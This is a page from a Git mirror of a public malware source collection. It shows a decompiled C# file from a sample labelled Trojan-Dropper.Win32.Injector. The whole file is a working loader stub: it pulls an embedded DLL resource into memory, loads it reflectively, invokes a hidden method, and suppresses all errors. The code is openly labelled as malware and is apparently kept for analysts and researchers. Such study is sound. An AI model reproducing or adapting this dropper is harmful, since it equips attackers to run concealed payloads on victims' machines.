mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
42 lines
1.2 KiB
C#
42 lines
1.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: program
|
|
// Assembly: p3p2arcf, Version=4.12.1990.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 08CA09E7-85A3-4626-AC9B-26D79BD2D208
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Injector.brzn-390d49825b8f0729344f976534742b524d9ce900514040facccd5c65f882cf11.exe
|
|
|
|
using System;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
|
|
public static class program
|
|
{
|
|
public static void Main(string[] args)
|
|
{
|
|
try
|
|
{
|
|
Type type = Assembly.Load(program.ReadFully(Assembly.GetExecutingAssembly().GetManifestResourceStream("kfj5ggvz.dll"))).GetType("someClass");
|
|
type.GetMethod("myVoid").Invoke(Activator.CreateInstance(type), new object[0]);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
}
|
|
}
|
|
|
|
public static byte[] ReadFully(Stream stream)
|
|
{
|
|
byte[] buffer = new byte[32768];
|
|
using (MemoryStream memoryStream = new MemoryStream())
|
|
{
|
|
while (true)
|
|
{
|
|
int count = stream.Read(buffer, 0, buffer.Length);
|
|
if (count > 0)
|
|
memoryStream.Write(buffer, 0, count);
|
|
else
|
|
break;
|
|
}
|
|
return memoryStream.ToArray();
|
|
}
|
|
}
|
|
}
|